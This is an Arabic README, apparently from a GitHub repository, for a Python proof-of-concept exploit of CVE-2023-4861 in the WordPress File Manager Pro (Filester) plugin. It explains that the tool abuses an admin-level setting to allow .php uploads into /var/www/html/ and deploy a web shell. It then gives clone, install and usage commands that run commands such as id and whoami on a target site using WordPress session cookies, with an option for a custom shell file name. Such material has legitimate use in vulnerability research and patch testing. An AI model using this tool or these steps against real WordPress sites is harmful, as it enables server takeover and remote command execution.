
أداة إثبات مفهوم آلية لتنفيذ الأوامر عن بُعد بعد المصادقة في إضافة WordPress File Manager Pro (Filester) عبر رفع ملفات عشوائية، بما في ذلك نشر قشرة ويب وتنفيذ الأوامر.
يحتوي هذا المستودع على إثبات مفهوم بلغة بايثون لثغرة CVE-2023-4861، وهي ثغرة تنفيذ أكواد عن بُعد موثّقة في إضافة ووردبريس File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ على Filesterيقوم exploit.py بأتمتة نفس النتيجة الأساسية الموضحة في النشرة العامة:
/var/www/html/ والسماح برفع ملفات .php.تفصيل تنفيذي مهم: يفترض إثبات المفهوم الخاص بي أن جذر الويب الهدف هو /var/www/html/. هذا الأمر مكتوب بشكل ثابت في بيانات الطلب وقد يحتاج إلى تعديل لإعدادات معامل أخرى.
استنسخ المستودع وادخل إليه:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
ثبّت التبعيات:
pip install requests
عرض المساعدة:
python3 exploit.py --help
مثال أساسي:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
اسم شل مخصص اختياري:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'